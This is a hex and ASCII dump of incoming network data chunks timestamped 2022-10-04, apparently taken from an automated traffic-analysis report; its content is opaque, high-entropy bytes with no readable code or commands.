                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27416INData Raw: 07 cb 21 f5 6f 79 29 a6 84 e9 ed 3f f7 bc bb 4f d1 eb e6 83 0a c2 41 a2 4f b7 ee 10 c3 e2 18 e7 22 4f 74 20 79 2e 52 c9 b6 bf 70 50 8b a0 59 16 95 1f 87 eb bc ff 7e d7 ee 1b 85 58 26 7d 56 44 37 b6 ba 00 82 88 9c e3 d0 ba ff 4e ee 05 95 b9 99 c6 f0 cd bd 84 1c 79 cc 98 be db f6 73 db 43 a6 6e c7 95 e5 16 3e 42 5c 18 13 6a e0 c3 be d7 25 59 f0 fa c6 01 bb a8 67 cd ce 75 bd 0a e5 5a 5d e7 22 4c e3 79 43 67 ed 02 b7 a8 25 a7 16 df 85 f0 a8 00 41 30 86 65 e8 e9 0f ab 44 be 31 c3 b6 b4 98 33 97 24 66 03 71 a2 95 8c c9 17 cb d6 31 e1 e7 ae c9 22 4f d5 d0 01 8e 8e 91 f9 21 ab ed bc 38 fb eb 4a 8d 4f 8e 22 ca 93 b5 fc 37 bf b4 c7 0a c5 46 05 88 59 32 0c 0c 8d 42 51 bb 3e e4 83 9f f3 97 4e 21 36 44 ef 44 9f 78 7c b2 47 6a 32 10 de a6 ac 4b 90 92 3c 10 ed 41 3f 7f
                                                                                                                                                                                                                                    Data Ascii: !oy)?OAO"Ot y.RpPY~X&}VD7NysCn>B\j%YguZ]"LyCg%A0eD13$fq1"O!8JO"7FY2BQ>N!6DDx|Gj2K<A?
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27432INData Raw: 3e d6 91 e2 37 2c 8b d6 65 cf c9 1e 98 df b2 77 19 4a 04 b7 45 48 ee 3c 81 1f 73 b3 5b 53 01 4b 00 4d 3b cf e4 00 9a 5d 76 2f 09 4b 08 b3 4d 75 a0 11 81 4b 16 9b c3 f0 a7 71 09 9c de 00 2a 8e d0 28 32 d1 67 84 c7 45 ed c1 5a 2a aa 47 bd cb a9 9b 07 60 f9 79 65 e0 f2 09 b3 3f ea fd 36 ae e9 6c fa 78 41 30 a9 40 ba 89 44 44 5d ef 76 a9 39 78 f5 b9 5d 1b f6 d3 2a 4d f0 9d 2e 80 f3 3b a9 78 c8 46 2f 21 90 fa 62 bb 52 db 89 11 7d 8c 1a b5 39 45 c7 1c 32 86 f4 3b 99 a8 47 39 1e 71 7e f6 74 2f b8 96 21 97 46 48 9a df 63 d2 5f 4c 43 65 c6 05 b7 0b 1a ce 65 99 8c c5 b1 c9 e1 98 0a 5c 8d 65 b5 4e 9a 09 49 74 2a 7a 46 da 1d f2 2c aa 1e 86 c5 58 7c 60 b0 2b 17 e7 8c f0 6a f9 f8 8e 97 8a a4 dc f6 bb e0 44 7c 19 cb a3 0b 78 1c 76 28 cc 50 1b dd e4 88 f1 d5 30 51 8a 24
                                                                                                                                                                                                                                    Data Ascii: >7,ewJEH<s[SKM;]v/KMuKq*(2gEZ*G`ye?6lxA0@DD]v9x]*M.;xF/!bR}9E2;G9q~t/!FHc_LCee\eNIt*zF,X|`+jD|xv(P0Q$
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27448INData Raw: aa 3f 5f 79 cc 3f 27 bb 38 03 23 8b ac 2c 50 69 6f a3 95 38 a7 b1 3d 5e 55 2c 14 68 cb 88 51 c7 a1 2c ac 71 af 21 ad 8f 40 c1 a7 ec 2f 6c 61 f1 aa f4 38 70 35 f5 08 44 13 c6 3c 0c 7c fc 49 ba e9 27 53 f6 02 0e df ec 08 67 02 a3 76 8f ae 8b d7 b9 e4 13 2d cb 5b e1 e9 5a 9a 97 ee e0 ce 45 88 be eb 7a 01 b1 75 5b 30 24 50 7c 9a 5f 28 18 51 9e 5e 42 72 87 2c 44 1a 0d 26 73 31 3f 13 16 5e a0 0e cc 23 b3 bc ce 29 bd 63 13 86 4d 5e 2c 1d 40 6c 15 d5 d5 83 71 c1 da 99 4f dd 92 08 2d 98 68 7d 6e ce e2 d2 85 f2 f7 ce b9 74 a4 3e 73 89 ce c0 f5 c5 a7 ca 13 35 64 26 2b c4 83 28 ec 8e 88 04 e0 2b d3 cd e6 9f 60 23 77 4f 9e 28 b1 a9 fd a4 d6 ba 95 1a 2a 1a e3 2e eb cc 36 04 07 23 ad 32 d2 1f c7 4d 63 7f f6 7d be 29 2a be 02 9d 0b 87 32 67 06 da 1d a8 11 b0 9d 21 ca f3
                                                                                                                                                                                                                                    Data Ascii: ?_y?'8#,Pio8=^U,hQ,q!@/la8p5D<|I'Sgv-[ZEzu[0$P|_(Q^Br,D&s1?^#)cM^,@lqO-h}nt>s5d&+(+`#wO(*.6#2Mc})*2g!
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27464INData Raw: f9 2e 69 b3 a1 de e5 ed 19 bc 71 e6 d5 3e 1b 2a b2 a6 fd 5a 40 76 08 c9 ca ae be 79 89 08 b7 5a b4 fe 77 9c 7b 7f 7a 67 d7 00 98 a2 41 7a c2 bf b4 3a ed c9 1a 9c 52 9a de 65 26 6b ae 7b d4 50 a6 5a ff c3 99 8f 8a cd 93 9b 43 9d 40 e5 29 ef 50 09 5a bb 6c a9 ef 2e a6 e5 42 34 72 54 3a 52 e3 58 3f f0 56 e4 dd 8d fb 49 46 26 8c 07 6b 5c 3f c7 26 97 c2 34 f5 e1 7f d1 7c 49 d2 6e 34 51 ed dd a7 79 d7 64 bd 29 e7 6e e1 95 b7 3a 19 c5 04 f9 9a bd d6 57 2f bc 2b 97 5f 1b 89 ce 0d ed 09 a5 14 66 1c a3 1a e4 27 37 10 d7 17 8a e5 e1 1e d9 70 3c 09 33 13 a2 a0 61 8a 75 b6 76 e8 71 2e bd f4 ad 49 f4 dc 23 4c ea 65 af fb f0 15 6e d4 17 ec 54 d5 02 2d 71 b8 00 df 38 cd 45 f2 cf 4b 33 d0 fa 20 f3 50 0c d1 f8 11 2b 7f e9 dc 05 f9 d8 95 10 72 61 84 e5 c9 80 15 9e b1 0e eb
                                                                                                                                                                                                                                    Data Ascii: .iq>*Z@vyZw{zgAz:Re&k{PZC@)PZl.B4rT:RX?VIF&k\?&4|In4Qyd)n:W/+_f'7p<3auvq.I#LenT-q8EK3 P+ra
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27480INData Raw: 27 2e 92 72 64 a2 08 b8 f9 6d 8d bc 60 80 a2 4f 2a 6f 2c 05 dc 84 dc 7c 3e 33 99 8f e8 17 60 f3 63 e0 c0 2c 4d 50 c8 db ab b1 37 9f 18 a4 26 eb da 8f 9a 97 21 68 66 fa 82 b7 55 80 30 36 b7 d6 26 98 7c a1 62 44 37 e6 3a 2e 53 6b a5 a8 66 b9 73 a9 ff 9e 87 98 c2 dc 26 4b b5 44 d7 7a ea 9a 8f 39 d6 8f cc c4 81 d6 b5 fe ef f1 22 34 6b bf 56 88 d3 d5 65 e6 02 3a e2 f4 61 27 2d f3 8a 3e 1e 9b 0a 43 a8 25 b7 e5 83 f6 d4 61 ab 99 61 5c 57 ab 59 0a 47 92 1c c3 d3 d3 73 d2 6f ec 94 59 e0 cd 8b 45 63 ae 16 27 ff 29 eb a3 a4 26 37 ad f8 6c 54 8e 67 26 5c 54 c7 79 62 01 ea 11 41 07 be 6e 98 35 af 60 1f d4 80 aa 8b 6e d8 b9 c0 e0 d4 c1 dc 1c e2 a4 71 5d 57 8b 3e 48 7c 3b 14 a6 50 1c ec 31 51 2e 50 3b 7d b2 d1 3b fc 97 d0 ab bd 98 f4 00 45 d1 cb e7 5e fe 82 31 eb 41 30
                                                                                                                                                                                                                                    Data Ascii: '.rdm`O*o,|>3`c,MP7&!hfU06&|bD7:.Skfs&KDz9"4kVe:a'->C%aa\WYGsoYEc')&7lTg&\TybAn5`nq]W>H|;P1Q.P;};E^1A0
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27496INData Raw: 24 05 9d 47 fb fe 5b 12 a8 a3 ce 1a 38 1e e2 b8 f9 0a 70 e5 cb bf 8a 29 f0 89 dc 8e 3b 75 00 b4 36 2d 6a 1c c0 7a 29 b3 ec 3d 9a d6 fc ef e0 08 d8 d3 ad 6e 6d bb 4e bf 63 5b 62 97 80 c4 41 97 f6 ec 75 ad 16 61 76 3e 56 bf 3c 38 02 39 7a 19 44 10 ab 46 7f 2b a9 97 72 c9 29 e1 17 70 08 cb 27 f0 5d 9c 6c 21 d7 0c bf 47 7a 51 11 10 3a e9 b3 67 2a 62 b0 dc 72 0f 90 76 f7 64 30 bd 92 ac 5b e7 58 27 60 93 6d d1 a8 9c 11 ca 7c 02 f0 1b 05 73 01 29 df d3 c6 4c 56 f4 0f a2 6e 3d 37 c1 f7 c7 ae a7 9d 29 f5 2d ca 49 f5 f5 04 4d 05 fd 1c a3 d9 37 5f 60 0f 4a e4 4b 9b 3f 27 00 bf 67 55 3d 9f 30 8c da 02 10 9f d0 b5 dd 73 3f a3 5f 8b 48 cf dd bd d8 26 ac b8 df 16 9c 44 f8 2d 83 00 d5 60 5e 44 7d 52 9d d8 98 be 8c b4 c5 94 c8 af c2 2b 57 a0 66 0a d1 f9 1f c8 4b 65 c3 21
                                                                                                                                                                                                                                    Data Ascii: $G[8p);u6-jz)=nmNc[bAuav>V<89zDF+r)p']l!GzQ:g*brvd0[X'`m|s)LVn=7)-IM7_`JK?'gU=0s?_H&D-`^D}R+WfKe!
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27512INData Raw: e1 0f 1c 9d 5e d9 09 6d 08 75 e8 b7 76 b0 d3 e5 ef 23 27 b1 c1 72 f4 b7 6e dc a0 b7 01 6f da 44 74 f6 ac 96 15 3d 47 15 2b d2 6c ad 4a cd bc 00 d1 0c e8 92 0e 86 ed 31 a3 26 ad 9d 23 d6 4f ae 65 c2 ef cf a9 46 de d7 75 75 5f 92 c3 05 14 bd 7e 7f db c9 e6 72 24 cd 77 e3 18 4c 20 bb 48 7c 71 0d 93 e8 e5 af 38 6d b7 8b ff 3a bf 08 6d 2c 03 47 e6 78 1b c5 a1 49 fb a4 eb e8 dd 0c 28 90 ad 60 60 0b 2e 3d e9 26 b9 91 b8 49 ed 30 5a 37 a9 33 14 8b 95 74 f7 a6 09 df e4 26 ce 67 30 4e 54 24 5a 3d 75 06 7b f0 35 64 de ac d4 5e ac 85 56 3e f5 8c c0 7f 1f f2 48 ab 7e fa 09 8a a5 58 86 da 55 fe 2a 95 ad f9 88 49 95 4f 73 78 d7 07 00 31 80 cf 23 0e 79 4d 75 d2 bf 9d 9f 45 79 bc 4e 0d 7d 78 a0 4e 2d 65 5b 7b 48 bc f0 dc 06 f2 da e1 44 49 7e 99 4d 1c e4 a7 eb 4e 0a 3a 09
                                                                                                                                                                                                                                    Data Ascii: ^muv#'rnoDt=G+lJ1&#OeFuu_~r$wL H|q8m:m,GxI(``.=&I0Z73t&g0NT$Z=u{5d^V>H~XU*IOsx1#yMuEyN}xN-e[{HDI~MN:
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27528INData Raw: 8b c6 54 81 f3 20 a6 c4 e0 ec b1 75 e1 f1 25 15 66 12 df fc 16 5c f0 31 2b 73 93 e2 21 39 82 e1 b5 8b e9 89 4c a8 99 9b f2 63 3f bd d4 12 60 9b fe a4 09 55 f6 cc 64 18 ab 8f dc 7b 6c 0b fb f5 f9 50 4e dc f5 16 ed 49 fe 65 4e 83 df c5 81 06 03 8e dd 98 f4 c4 ef 22 dc 0e e9 2d 86 8e cb 3d a4 3d 1a 1d fa 9c 61 27 a7 50 3c c2 ce f1 59 be f4 9c 51 ba f8 bc 0b 51 a3 9f 4b 43 3e 18 45 f9 f3 a1 7b 8a 0e 9b 0a 5e 3f 6b 3d e1 dd 33 ba 17 e3 97 d2 4f f7 e5 e8 6d 17 ca e0 a9 39 13 dc 13 55 0a be df ca 4f 64 9e 1b 6c 74 93 20 6e f4 03 77 98 c1 2d d4 90 1f 2c c5 cf 59 23 ca 6e ed 3f 7e 7f 52 53 16 4e 49 aa 2d b9 38 37 dd 91 26 49 18 d1 99 df 93 12 ae 11 2c df 80 7e 16 11 87 4a 1f d6 98 c1 ce b5 41 b2 d3 11 81 61 01 21 4a 65 3e c4 a7 8e 6a fb 1a 94 8f 16 d5 87 ee 5f 1c
                                                                                                                                                                                                                                    Data Ascii: T u%f\1+s!9Lc?`Ud{lPNIeN"-==a'P<YQQKC>E{^?k=3Om9UOdlt nw-,Y#n?~RSNI-87&I,~JAa!Je>j_
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27544INData Raw: 5e f5 31 72 67 3d bf c1 96 b9 3a bd e6 2d 24 00 9b cc a4 06 2b ba d6 dc 8f 31 9f a2 88 30 12 3a e5 ef 3e 12 9f 28 9f 75 6e d4 c2 0b 1b 87 68 0b 76 be 3f f8 28 05 aa 9a 57 29 5a 8c b0 c3 e1 f0 a1 04 d0 5e 49 c7 e0 67 65 a6 6e 70 85 2f d2 88 2e 04 04 11 b1 2c 05 d4 d5 09 47 36 f7 0a 7d 91 49 be 56 ab 48 00 eb a6 df 90 f2 62 29 a0 fd 94 01 ba 28 62 7b da 2e 61 6c a8 51 df 35 db 72 dd b1 da fa 86 25 26 cb 00 81 c0 9c fa 8d e5 d2 9a 57 cc c8 be b3 9d 43 18 58 d2 4d 39 38 9f ed 86 94 7a 02 3e 51 e7 52 da 31 30 cc 1f 62 db 72 cd 54 80 21 f0 ab 2a 40 20 fa 40 c5 e4 3a ad 38 81 e8 68 79 95 61 09 80 e5 ed cb ad ac fb c9 08 6d 60 a4 9a 27 cc 9b da 06 c7 d0 6c e7 b2 39 a3 25 40 0a 4d 8f cd 8b 2d 45 55 61 0e 54 e0 bb 61 24 57 88 0d 0b 83 0f ee f5 cf d7 d7 22 a7 5b 2d
                                                                                                                                                                                                                                    Data Ascii: ^1rg=:-$+10:>(unhv?(W)Z^Igenp/.,G6}IVHb)(b{.alQ5r%&WCXM98z>QR10brT!*@ @:8hyam`'l9%@M-EUaTa$W"[-
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27560INData Raw: 50 ce 5c 0c e7 53 33 0a 93 52 59 cb c0 05 b9 92 02 11 b2 19 53 88 82 5f 5b 1e c4 60 f9 a9 5e 5f 44 2f 05 09 04 eb 5c 6e f3 be d6 86 c8 58 94 c7 c8 5d fc ec 4a 82 a9 8f fb 8d 5c 95 e0 70 7f 6c 13 a5 32 fe 28 1e 84 d1 d0 fe d7 a8 b3 23 1b 5d a3 f6 d7 cc f9 b8 4d 63 f8 17 c4 0f e2 b4 cf 6b 65 a8 4f ac 0a 91 61 50 82 8e 7e 62 ab 6c f2 b1 61 85 74 1c 7a a8 57 da 16 04 0e c5 12 df 30 50 67 e3 dd 80 54 91 8f a7 bb 78 6d 59 11 75 eb 73 d0 a0 01 ad 82 42 63 fc 81 43 60 7b 59 98 3f 4a 42 3a c0 21 7f 6a b1 9f 22 5c 67 ce 7f 51 e5 ae 94 f6 6a 3e 3d 5b 57 76 91 b3 11 3f 52 a3 e4 d4 23 4c 19 44 fe e5 b5 60 cc cb db d2 cd 20 18 4b 79 b4 8f c6 78 cb 78 03 57 cc 0d 3e 10 8a 2a f9 c2 ca 05 2a 1b 09 65 ef 6d 75 19 56 85 61 66 af 9d 1a 59 69 0f b2 04 2f ed f0 a2 bb f6 6d 2c
                                                                                                                                                                                                                                    Data Ascii: P\S3RYS_[`^_D/\nX]J\pl2(#]MckeOaP~blatzW0PgTxmYusBcC`{Y?JB:!j"\gQj>=[Wv?R#LD` KyxxW>**emuVafYi/m,
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27576INData Raw: a9 86 66 ed 7a 40 c5 95 3b 19 8c c9 51 cc 02 f7 ff c8 b1 75 84 48 95 0a e3 ca 8b 46 35 52 df a0 b6 25 4e c0 05 47 1e a7 ff d5 01 23 9a 68 37 40 f4 7c 82 9f ef 0d 58 ca ed 87 71 0f 1e c8 bd 14 73 f8 e7 ba 46 1e 6d cd 17 2c 59 a4 72 99 ee fe 30 af c5 57 24 61 53 fc 8b ed 2a 41 92 e3 20 97 e1 10 c5 a8 c4 cc cc f1 a9 6a 17 a4 e9 40 d1 b6 d3 ce 31 89 d1 0f 21 a4 7f 1f db 92 16 4f aa 3e 4e ac 3c 12 01 3d 53 66 2e bc 86 81 61 de fe 93 9c 27 73 9d 0f 06 b9 72 a3 c7 27 6b 20 80 be d5 1a 15 08 19 e5 55 15 46 19 44 81 8b 0c a7 f0 f7 95 75 27 3c c2 90 3f 88 d2 a0 d3 31 9f fb 1d 56 4e a3 d0 e0 1f 1a 9a f1 b8 34 72 ec fa 7c 8d 1e 8f a0 d4 e7 a4 eb 8e 53 ba b4 01 c6 2e 09 e4 56 9e e4 fd 85 13 08 1c af 36 ce 44 9f a4 38 35 86 97 56 60 2d 1a 9a d4 de a1 b4 67 34 45 bf 1d
                                                                                                                                                                                                                                    Data Ascii: fz@;QuHF5R%NG#h7@|XqsFm,Yr0W$aS*A j@1!O>N<=Sf.a'sr'k UFDu'<?1VN4r|S.V6D85V`-g4E
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27592INData Raw: 2a 7a 63 7c 36 00 1e 93 10 e5 71 c1 49 2d 26 12 6f ac b5 c2 16 41 8a 63 3f 81 6d 52 42 fe 57 f3 c4 78 30 6e 97 c2 13 c8 da 54 cc 6b fe 2d 3c ee 86 54 00 73 ef 13 82 c3 78 b5 a4 d4 30 c7 7f b5 3e 4d 7b 73 4a 55 e7 80 b2 e8 d3 5a 86 ac e8 11 87 b8 04 86 d0 3b 0d 52 52 e9 10 14 85 c5 e8 06 59 7c 52 1a e9 fd a0 66 cd d0 3f 7c 22 d9 59 58 64 41 e0 43 87 1f 4e b3 d2 36 e6 b7 46 95 37 cc 1f 7f 1e c7 78 d2 ea 56 f1 a1 3d 0a 85 47 d3 53 cc ff 36 fd 3a af f1 4b 33 19 01 4b 78 66 6a 6f 64 15 20 1d c7 da 5f b5 16 da 0f 81 09 8c 9f 81 42 c3 2b 01 8b 16 47 6a f7 15 1a 2b 3d e8 89 1c 27 35 2e ec b2 20 86 c9 4e 9e cc 09 df 30 7a 67 1a 46 75 2f 08 f8 4f b5 26 4c 21 d7 0d d4 21 ba f8 c0 d9 74 ed 27 9c 43 ac 1d e0 bb d0 60 43 a8 68 2d fd e7 34 b4 ff 3c 18 08 4f 78 76 e4 78
                                                                                                                                                                                                                                    Data Ascii: *zc|6qI-&oAc?mRBWx0nTk-<Tsx0>M{sJUZ;RRY|Rf?|"YXdACN6F7xV=GS6:K3Kxfjod _B+Gj+='5. N0zgFu/O&L!!t'C`Ch-4<Oxvx
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27608INData Raw: 27 08 33 bf 5e 7e da f5 15 14 ee 5d f9 e8 f8 7a 80 39 fa 69 e0 1f 97 b4 d4 38 eb bb f3 ee 2e 99 9c 48 86 9a 25 82 f5 9b 62 49 6b c6 81 7f ca 7a 5c 18 d0 51 64 67 ef 11 b6 9b 8c a7 f4 58 e2 2b 8a 5d 80 3b 35 69 f6 4d 1d 8e 07 63 d6 81 a2 6f f9 9c 78 54 0d a9 46 02 43 46 3b a6 09 68 0d 95 19 c5 61 9a 56 01 3b e7 1e 4f 99 1a a1 60 47 e9 8e d9 c7 39 eb 6c 9b c6 07 18 1c 47 43 ce 8f 8d b5 21 97 b0 56 24 ec a9 ed 85 a9 a6 f1 74 be 80 2a 3e db db fa 57 d1 a4 89 16 e1 a7 3b dc 00 f9 a3 01 2b 4c fa 55 49 0b 37 9f 5f 97 8b ac ed 36 af d9 e0 0c f9 08 2e 08 b2 81 17 0a f5 09 6b 3c 93 1a fa df b5 fa 22 2d de 43 00 63 ba 0b be 8e c7 72 cf d3 ec 8a 14 27 74 fd 7b 4e b6 25 4e 7e 59 af 11 ce aa 1a 53 26 2a 4b 23 1a af 98 73 ef 2c 34 63 2b b0 67 c0 e5 cb b4 90 e3 3e c9 1f
                                                                                                                                                                                                                                    Data Ascii: '3^~]z9i8.H%bIkz\QdgX+];5iMcoxTFCF;haV;O`G9lGC!V$t*>W;+LUI7_6.k<"-Ccr't{N%N~YS&*K#s,4c+g>
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27624INData Raw: 96 cd 87 0d 41 e3 2c 9d 10 1b e7 de a4 0f ea 89 7c 51 74 6d fd d2 38 bd 38 12 ac 82 8b de a2 9d db 9f ae 32 6a 7f d5 ef 5a 65 ce a6 a4 e3 87 e7 65 67 4c b5 fe 90 d7 d4 4c b2 f3 34 cc cc bd d8 78 20 06 29 07 bd e4 9e 64 c3 f3 36 99 df 9a b7 e9 26 de a7 d4 82 74 17 e9 82 59 a4 9d 93 4b 27 9c 0a 9c 1b 40 f9 92 56 3b cb 1f 9a 29 41 9e de ac d7 2a 00 87 65 0f 39 8d 0a 15 59 72 a9 b4 5c da 9e 50 b7 a2 7f 3b dc 9b 87 4b 5d 52 f1 83 20 94 0e bd ce e6 a3 c5 ca 30 ec fd ba 0c 0c b6 90 d3 d6 0c c2 51 31 85 4e 52 3c 88 38 27 85 11 49 62 1f 46 ac 42 e2 da b3 a8 ac de 41 39 4d 71 b4 0d 86 4a 96 02 a9 d7 6b da 38 16 cf 61 a7 75 f0 9d 6e 3d 55 d7 7e 6b 8c 9c f9 a3 5c 21 e1 04 e1 37 64 9f b3 67 83 b0 78 ca 16 62 dc f0 89 b5 0b 5d d5 7b 10 71 bd bc a6 5a ee b2 26 5e 4a 38
                                                                                                                                                                                                                                    Data Ascii: A,|Qtm882jZeegLL4x )d6&tYK'@V;)A*e9Yr\P;K]R 0Q1NR<8'IbFBA9MqJk8aun=U~k\!7dgxb]{qZ&^J8
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27640INData Raw: d2 ec 5e 35 42 d5 da 54 b4 dc 52 60 f3 04 58 e2 ca 93 e0 a4 f3 6d e5 a8 7d fc b6 98 0a 50 98 25 2c 64 32 a5 04 ff e9 27 da 4d cd 27 fe 3d 56 14 e2 a8 f9 00 19 4f 21 55 ba ba 29 a4 49 2f 16 87 54 10 89 16 34 8b b1 5a ba 53 16 19 05 1f d2 5b 58 c4 d0 59 43 6c 61 eb bc 68 34 ea 07 de ee 65 2d 21 75 30 06 05 0a 4b 49 54 a5 04 61 3f 49 67 7e cc a7 54 86 21 51 0c bf 58 63 a6 51 5e a3 86 29 b1 e5 d2 16 df 7e 4e 7d 3c 90 db 95 8f ab e1 b4 49 4b 59 35 58 14 13 11 fa bf 3d 7d 7b 22 03 4f 66 c2 70 b9 f4 c4 01 f1 77 88 91 68 9b c1 5c 8d 39 b3 bd 9a 5c aa aa 3a fb 90 62 91 f3 51 00 fb 09 7a c6 83 45 b0 bd ff ba eb 87 46 37 cf 27 59 e3 e6 84 93 2a 9f 04 7e d5 ad e7 a4 de 11 de 14 38 35 04 1b 2d 8b 2b 04 38 5d 12 81 c1 ac 5d b9 93 42 a3 5a ad 4c d6 dd b5 f0 25 eb 9b e9
                                                                                                                                                                                                                                    Data Ascii: ^5BTR`Xm}P%,d2'M'=VO!U)I/T4ZS[XYClah4e-!u0KITa?Ig~T!QXcQ^)~N}<IKY5X=}{"Ofpwh\9\:bQzEF7'Y*~85-+8]]BZL%
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27656INData Raw: 3e 8b f7 5e 3f 26 36 a4 d7 0e 59 ef 6b 63 3b 57 6c a6 0d 57 89 a9 a4 9e 36 31 df ae 22 df 18 b4 e1 b6 45 88 91 f3 ef 13 01 6c 18 51 6c 9b cc 07 80 2f 63 c0 0e 3d a5 36 a9 3a 6a 1e 54 4a 5d f0 d6 da d8 2c d4 47 4b 2d 52 99 2d a7 71 28 6a 6a 05 a9 e9 f5 2b 47 2e 2c 30 49 1f a9 8f c3 04 2e d8 68 20 09 3d 4c 8e 98 20 4e f9 bc 6d 45 20 31 33 6c cd 87 72 91 14 76 0f a9 25 7c 38 d9 fa c8 74 5a c1 72 c7 f6 04 2c da 44 10 55 54 5d 9c 84 98 eb 3c b9 12 31 8e 71 b7 4f 2b 12 bb db ab 5d ea 66 3a d3 80 9e 8a 7d 9f a0 0d 8e 80 81 22 11 78 d1 18 0b 9c f1 7f de af fb fe 3a 7c 72 43 bc 80 2e 17 be ed 0f 18 dd 4e de 1c 5a 67 24 86 c8 73 e1 aa 99 fe ce d9 31 f5 03 ff a5 2d c5 2a ad 30 ae 7b 7a ca d7 ae 61 f2 a1 bd 13 a3 df 28 95 5c 2e f1 7e 88 ee ae 79 e9 a8 f0 19 ba 90 8c
                                                                                                                                                                                                                                    Data Ascii: >^?&6Ykc;WlW61"ElQl/c=6:jTJ],GK-R-q(jj+G.,0I.h =L NmE 13lrv%|8tZr,DUT]<1qO+]f:}"x:|rC.NZg$s1-*0{za(\.~y
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27672INData Raw: a9 39 a3 61 d9 82 b5 07 02 e6 35 c0 8a 98 9f 4f 69 2a e2 7a 07 97 f2 6b 2f 4d 65 93 47 49 d4 e3 72 e4 f5 f2 c1 e0 f4 d5 0c db 78 39 06 65 35 54 3f 4e af 8b 5c 7f 47 a4 62 15 16 22 ff dc 7e 2f d6 fa a7 ab f5 97 88 22 2f df ab 31 e9 39 5e 74 1b d7 3e 0e 99 74 58 9e 10 6d 9e e4 1a 62 20 b3 0b ca c1 91 93 4e 6c 69 53 f7 ba b6 32 94 03 fd 32 8b 31 dc 48 8f f1 e5 ba 92 42 32 9e 4d d7 e6 9a 91 cb 38 ca b8 64 99 74 bf ad a7 c3 31 9f 92 c3 74 b0 7e 1b 49 7c a4 b6 a7 89 15 12 03 06 10 b6 60 05 d7 a5 61 fe 44 e8 b6 55 75 a5 2f ee 58 c6 19 81 dc cf 7f ad 3e dc da 06 0c 4e 19 ff c0 b2 52 6f c5 2b cb 78 4e 43 92 b8 96 b2 55 91 7b d5 d8 50 e7 0e 04 67 95 95 13 36 64 1a f7 d4 6a 00 47 54 6a dc 7b 91 ef 29 6f a6 16 1c 32 3c e6 01 5e b2 4a fb eb 09 8a 3c 70 09 f8 8b 38 06
                                                                                                                                                                                                                                    Data Ascii: 9a5Oi*zk/MeGIrx9e5T?N\Gb"~/"/19^t>tXmb NliS221HB2M8dt1t~I|`aDUu/X>NRo+xNCU{Pg6djGTj{)o2<^J<p8
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27688INData Raw: fc 1e d2 78 01 72 35 34 7d 46 82 4b fd 22 2c 0a e9 46 33 09 c8 42 d6 e4 b7 b6 80 02 ed 20 79 0b 12 f0 16 0a 34 c3 d3 b0 8e 76 66 d2 1a 97 da cf 7b ae 75 9e 2f 77 b2 96 e2 4b e6 6c c7 7b 7f 9a 86 83 06 09 54 43 47 bc b0 40 c8 64 df 45 f5 59 5a 78 18 2c 74 be 26 1a 6a 2d 3c 1c c7 8e fb c9 99 8f 60 a6 dd cd a3 62 93 16 16 f5 6a 80 91 07 ab a1 f8 af 38 a4 e2 fa 9f e5 a1 96 e3 93 b7 72 fe 90 47 1d 55 75 1d bd 04 8c d9 3d dc 65 6b bd e7 00 1f c7 4b 52 7b f4 d7 ca ed 9a 53 c0 71 56 b3 76 af b3 81 8f 7f d6 60 e0 a8 cc 41 3a 5f 4a 0b 5c fb 14 29 c0 b1 11 d3 af 6b c9 90 06 27 3a 3a a9 cf fc 2e 36 0a 40 ed 80 c6 bf 57 da 89 a0 8f df 86 0c c0 52 07 c7 e0 1c 52 72 fa a5 79 14 ea 16 91 a6 76 c0 89 c4 f0 05 0b f4 4e c8 43 c7 9d 78 bf ab 78 2d f4 c5 cf c4 13 38 dc ff e8
                                                                                                                                                                                                                                    Data Ascii: xr54}FK",F3B y4vf{u/wKl{TCG@dEYZx,t&j-<`bj8rGUu=ekKR{SqVv`A:_J\)k'::.6@WRRryvNCxx-8
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27704INData Raw: 03 27 d5 d8 34 f6 47 c7 3f 73 b4 43 ac 21 cc 3f 96 80 fd 3c 8c ad 3a c8 cd f4 a8 83 33 4e 75 8b 47 70 6f 69 f9 ff 22 8c e1 d0 12 fb d1 4a 9d bf c1 8e 37 a5 a9 cf 9f d2 d2 37 89 97 7a 59 12 94 ba 0d b8 c7 79 94 24 f8 9a c3 54 0f 94 cc f2 c4 5c 72 3c bf 73 4b 79 d0 ed b3 d9 63 63 c3 df 24 db c3 91 61 aa 4a 2a 18 01 5d a6 c6 10 13 44 22 f6 c8 8c 77 75 c1 c7 8b d6 e9 fd 0a 39 ac 16 68 d2 33 34 68 53 95 f7 b3 b0 e6 0b 8c 37 8a 5d e3 31 ae 68 12 46 9f 87 d8 85 5b 4b 38 b4 ac b7 4e 7a c8 01 e0 90 a9 8a 7e 5c 11 86 97 e9 65 6a ad a4 07 e8 9d d0 0e 20 58 c4 be cf 61 e4 7b b2 40 14 6d ec 0c b9 30 68 bf 03 0c a7 55 e2 81 b5 5d cc ac 59 48 90 82 5c 2e a0 48 7b 10 c1 5e 8d 83 07 9e b6 9d d1 50 ee 93 79 e3 21 71 4d 0a c5 39 fe 66 c2 dc 56 cb 42 d0 c3 a9 ca ac 60 14 f2
                                                                                                                                                                                                                                    Data Ascii: '4G?sC!?<:3NuGpoi"J77zYy$T\r<sKycc$aJ*]D"wu9h34hS7]1hF[K8Nz~\ej Xa{@m0hU]YH\.H{^Py!qM9fVB`
